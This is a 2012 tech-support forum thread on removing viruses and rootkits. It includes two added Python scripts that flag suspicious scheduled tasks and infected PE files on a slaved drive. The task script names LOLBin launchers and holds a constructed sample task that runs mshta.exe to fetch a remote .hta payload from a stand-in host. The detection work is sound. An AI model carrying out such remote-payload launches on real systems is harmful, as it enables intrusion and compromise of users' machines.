Technibble Forums > Technical Discussions > Security, Viruses and Trojans

#11  07-10-2012, 01:38 PM  Galdorf

System restore is never a good idea, due to the possibility that the restore point could have infected files and the chance that a rootkit/bootkit would just re-infect the machine.
Best to start with an external scan via rescue CD (Kaspersky) or slave it into a test bench and scan.
That way you get to detect and remove rootkits/bootkits/viruses/trojans and worms.
#12  07-10-2012, 01:43 PM  MobileTechie

I think it's often a great first step. You can scan for rootkits etc later. Quite often it works wonders and gains you full online control of the machine.
#13  07-10-2012, 03:59 PM  npinc

Quote (originally posted by Galdorf):
System restore is never a good idea, due to the possibility that the restore point could have infected files and the chance that a rootkit/bootkit would just re-infect the machine.
Best to start with an external scan via rescue CD (Kaspersky) or slave it into a test bench and scan.
That way you get to detect and remove rootkits/bootkits/viruses/trojans and worms.
That works well with many infections, but not all. We just found that accessing the drive remotely and manually pulling infections out of key folders accelerates the process for us (and we don't even have to meddle in personal folders to do it).

A manual process works well for infections that hide and monitor others, disable key resources, etc. We can do it quickly because we know exactly what we're after and where to find them. That's probably a good part of what sets us head and shoulders above any competition. We've run into many occasions where the previous tech missed key files. Simply using automated tools is insufficient.

It might not work well for the next person if they don't know exactly what they're targeting though, so individual mileage may vary.
#14  07-10-2012, 08:26 PM  Encrypted Existence

Quote (originally posted by npinc):
It might not work well for the next person if they don't know exactly what they're targeting though, so individual mileage may vary.
How do you know which folders to check for each virus? Or do you check the same (common) ones each time?
#15  07-11-2012, 01:06 AM  Galdorf

Quote (originally posted by npinc):
That works well with many infections, but not all. We just found that accessing the drive remotely and manually pulling infections out of key folders accelerates the process for us (and we don't even have to meddle in personal folders to do it).

A manual process works well for infections that hide and monitor others, disable key resources, etc. We can do it quickly because we know exactly what we're after and where to find them. That's probably a good part of what sets us head and shoulders above any competition. We've run into many occasions where the previous tech missed key files. Simply using automated tools is insufficient.

It might not work well for the next person if they don't know exactly what they're targeting though, so individual mileage may vary.
Problem with that method is, if all the exes, coms and dlls are infected, you miss them, e.g. w32.Virut etc.

I do an external virus scan on a fast test bench, followed by manual inspection for unknown rootkits/bootkits or zero-day fake AVs, autoruns and scanning processes, which takes 30 mins at most for the whole thing.
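Galdorf's manual inspection step (autoruns, processes) is not spelled out in the thread. As an added example, not code from the forum or from any poster, here is an offline check of one autostart location, the Task Scheduler store, as it would be run from a Linux bench with the suspect drive slaved and mounted read-only. The mount point (/mnt/suspect), the system drive letter C:, the trusted-folder list and the LOLBin list are the tech's own assumptions to tune; the sample task files are constructed.

```python
"""Triage of the Task Scheduler store on a slaved Windows volume.

Added example, not from the thread. Assumes the suspect drive is mounted
read-only on a Linux bench (e.g. /mnt/suspect) and that task definitions are
where Windows keeps them: <Windows>/System32/Tasks/**, one UTF-16 XML file
per task. Standard library only, so it runs offline."""
import ntpath
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Where a legitimate task's Exec action normally runs from. Assumption: the
# system drive is C:; tune per customer build.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")
# User-writable locations droppers favour because no admin rights are needed.
SUSPECT = re.compile(r"\\(appdata|temp|tmp|programdata|users\\public|recycle)", re.I)
# Signed Windows binaries that malware uses to launch a payload, so the task
# itself points at a Microsoft file and looks harmless at first glance.
LOLBINS = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "powershell.exe", "cmd.exe"}
ENV = {"%systemroot%": "c:\\windows", "%windir%": "c:\\windows",
       "%programfiles%": "c:\\program files", "%programdata%": "c:\\programdata"}


def expand_env(path):
    """Lower-case the command path and resolve the %VARS% seen in task XML."""
    low = path.strip().strip('"').lower()
    for var, value in ENV.items():
        low = low.replace(var, value)
    return low


def load_task_xml(raw):
    """Parse one task file. Windows writes them as UTF-16 with a BOM; the XML
    declaration is dropped because ElementTree is handed decoded text."""
    bom = raw[:2] in (b"\xff\xfe", b"\xfe\xff")
    text = raw.decode("utf-16") if bom else raw.decode("utf-8-sig")
    return ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", text))


def task_actions(root):
    """Yield (command, arguments) for every <Exec> action in a task."""
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS) or ""
        args = ex.findtext("t:Arguments", default="", namespaces=NS) or ""
        yield cmd.strip(), args.strip()


def classify(cmd, args):
    """Return why the action deserves a closer look, or None if it looks normal."""
    full = expand_env(cmd)
    if not full:
        return None
    if SUSPECT.search(full) or SUSPECT.search(args.lower()):
        return "runs from user-writable location"
    if ntpath.basename(full) in LOLBINS and args:
        return "script host or LOLBin with arguments"
    if not full.startswith(TRUSTED_PREFIXES):
        return "binary outside Windows/Program Files"
    return None


def triage_tasks(tasks_dir):
    """Walk <Windows>/System32/Tasks on the mounted volume and return
    (file, action, reason) tuples for anything that looks off."""
    findings = []
    for dirpath, _, files in os.walk(tasks_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read()
            try:
                root = load_task_xml(raw)
            except (ET.ParseError, UnicodeDecodeError):
                findings.append((path, "", "unparseable task XML"))
                continue
            for cmd, args in task_actions(root):
                reason = classify(cmd, args)
                if reason:
                    findings.append((path, (cmd + " " + args).strip(), reason))
    return findings


# Constructed sample task files, in the same shape and encoding as real ones.
TASK_TEMPLATE = ('<?xml version="1.0" encoding="UTF-16"?><Task version="1.2" '
                 'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
                 '<Actions Context="Author"><Exec><Command>{cmd}</Command>'
                 '<Arguments>{args}</Arguments></Exec></Actions></Task>')


def make_task(cmd, args=""):
    return TASK_TEMPLATE.format(cmd=cmd, args=args).encode("utf-16")


SAMPLES = {
    "SynchronizeTime": make_task(r"%SystemRoot%\System32\sc.exe", "start w32time"),
    "SystemUpdate": make_task(r"C:\Users\Dave\AppData\Roaming\svchost.exe"),
    "Maintenance": make_task(r"C:\Windows\System32\mshta.exe", "http://example.invalid/a.hta"),
    "Backup": make_task(r"C:\Tools\backup.exe"),
}


def demo():
    """Run the classifier over the constructed samples; returns {task: reason}."""
    out = {}
    for name, raw in SAMPLES.items():
        for cmd, args in task_actions(load_task_xml(raw)):
            reason = classify(cmd, args)
            if reason:
                out[name] = reason
    return out
```

On the bench, `triage_tasks("/mnt/suspect/Windows/System32/Tasks")` lists every task whose action runs from a user-writable folder, launches a script host with a payload, or points outside Windows and Program Files; `demo()` runs the same classifier over the constructed samples. A hit is a candidate for the manual look, not a verdict: hash the target file and compare it against a clean build before deleting anything.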
#16  07-11-2012, 06:37 AM  npinc

Quote (originally posted by Galdorf):
Problem with that method is, if all the exes, coms and dlls are infected, you miss them, e.g. w32.Virut etc.

I do an external virus scan on a fast test bench, followed by manual inspection for unknown rootkits/bootkits or zero-day fake AVs, autoruns and scanning processes, which takes 30 mins at most for the whole thing.
Actually, I don't. We're VERY familiar with Virut. We know exactly what we're looking for and how to identify its nasty presence in a hurry. Virut can't be removed fully and cleanly by virus removal tools, despite what they themselves claim. It's a nasty bugger of a virus.

Also, it's not a carte blanche process, hand picking is just one of many things we do. We don't disclose our complete process. We just clean up the messes.
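Neither poster describes how they spot a file infector by hand, and npinc keeps that process private. As an added example (not the forum's code, and not a W32.Virut signature), the following applies generic PE header checks that appended code or a packer tends to trip: an entry point inside the last section, a section marked both writable and executable, and raw data the header claims but the file does not hold. The sample images are constructed inside the block with a small PE builder; the mount path is an assumption.

```python
"""PE header triage for file-infector style changes on a slaved volume.

Added example, not from the thread, and not a W32.Virut signature: these are
generic indicators that appended code or a packer tends to trip. Assumes the
suspect drive is mounted read-only on the bench at the path passed to
triage_volume(). Standard library only."""
import os
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Return (entry_point_rva, [section dicts]) or raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 44 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    entry = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "vaddr": vaddr,
                         "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize, "chars": chars})
    return entry, sections


def triage(data):
    """Reasons this image deserves a manual look (empty list = nothing odd).
    Packers such as UPX also trip the entry-point check, so hits are
    candidates to examine, not verdicts."""
    entry, secs = parse_pe(data)
    if not secs:
        return ["no sections"]
    reasons = []
    home = next((s for s in secs if s["vaddr"] <= entry < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    if home is None:
        reasons.append("entry point outside every section")
    elif home is secs[-1] and len(secs) > 1:
        # Compilers put code first; appended code lands in the last section
        # and the entry point is redirected there.
        reasons.append(f"entry point in last section {home['name']!r}")
    for s in secs:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            reasons.append(f"section {s['name']!r} is writable and executable")
        if s["rawptr"] + s["rawsize"] > len(data):
            reasons.append(f"section {s['name']!r} raw data extends past end of file")
    return reasons


def triage_volume(mount, exts=(".exe", ".dll", ".scr", ".sys")):
    """Walk the mounted volume; yield (path, reasons) for flagged PE files."""
    for dirpath, _, files in os.walk(mount):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as fh:
                        reasons = triage(fh.read())
                except (OSError, ValueError):  # unreadable, or not a PE file
                    continue
                if reasons:
                    yield path, reasons


def build_pe(sections, entry_rva, truncate=0):
    """Construct a minimal PE32 image (constructed sample, not a real binary).
    sections: list of (name, vaddr, vsize, rawsize, characteristics)."""
    opt_size, nsec = 224, len(sections)
    raw_ptr = (0x40 + 4 + 20 + opt_size + 40 * nsec + 0x1FF) & ~0x1FF  # 512-byte aligned
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                   # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)   # ImageBase, alignments
    table, body, ptr = bytearray(), bytearray(), raw_ptr
    for name, vaddr, vsize, rawsize, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, ptr, 0, 0, 0, 0, chars)
        body += b"\xCC" * rawsize
        ptr += rawsize
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    image += b"\0" * (raw_ptr - len(image)) + bytes(body)
    return image[:len(image) - truncate]


CODE = 0x60000020   # CNT_CODE | MEM_EXECUTE | MEM_READ
DATA = 0xC0000040   # CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
CLEAN = [(b".text", 0x1000, 0x200, 0x200, CODE), (b".data", 0x2000, 0x100, 0x200, DATA)]


def demo():
    """Triage three constructed images; returns {name: reasons}."""
    appended = CLEAN + [(b".xyz", 0x3000, 0x400, 0x400, CODE | IMAGE_SCN_MEM_WRITE)]
    return {"clean": triage(build_pe(CLEAN, 0x1010)),
            "appended": triage(build_pe(appended, 0x3010)),               # entry moved into a new W+X section
            "truncated": triage(build_pe(CLEAN, 0x1010, truncate=0x100))}  # header claims bytes the file lacks
```

On the bench, `for path, why in triage_volume("/mnt/suspect/Windows"): print(path, why)` lists the executables to look at first; anything flagged should then be hashed and compared against the same file from a clean install of that Windows build before it is replaced. `demo()` shows the three indicators on constructed images, including a clean one that produces no hits.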
#17  07-11-2012, 09:53 AM  Cadishead Computers (Administrator)

@npinc, I have just had a look at your site, very impressive.

However, I'm not sure if you're aware of this or not, but clicking on your Parts tab, and from there to the online parts catalogue, it appears that Zen Cart has only just been installed, and there is what looks like setup information displayed throughout the catalogue pages.

Apologies if you did know about this, but I thought I would let you know in any case.
__________________
Hope this helps
Be Safe

Nige
Cadishead Computers
#18  07-11-2012, 04:04 PM  npinc

Quote (originally posted by Cadishead Computers):
@npinc, I have just had a look at your site, very impressive.

However, I'm not sure if you're aware of this or not, but clicking on your Parts tab, and from there to the online parts catalogue, it appears that Zen Cart has only just been installed, and there is what looks like setup information displayed throughout the catalogue pages.

Apologies if you did know about this, but I thought I would let you know in any case.
Thanks so much. You're right. I TOTALLY forgot about the link on that page and I really appreciate the reminder! I'm setting up a new online store and only have the base install in place at this time. I changed from the old provider and rerouted the domain.

I should fix that right away. Thanks again.
#19  07-11-2012, 04:41 PM  Cadishead Computers (Administrator)

Not a problem buddy. As I mentioned, I wasn't sure if you were aware of it or not. Didn't want you to think I was putting my nose in where it wasn't wanted, etc.

A fresh pair of eyes always helps.
#20  07-11-2012, 06:06 PM  npinc

Quote (originally posted by Cadishead Computers):
Not a problem buddy. As I mentioned, I wasn't sure if you were aware of it or not. Didn't want you to think I was putting my nose in where it wasn't wanted, etc.

A fresh pair of eyes always helps.
Absolutely. I created a quick temporary index page until I get it up and running. Anything else you find, please let me know. So much appreciated.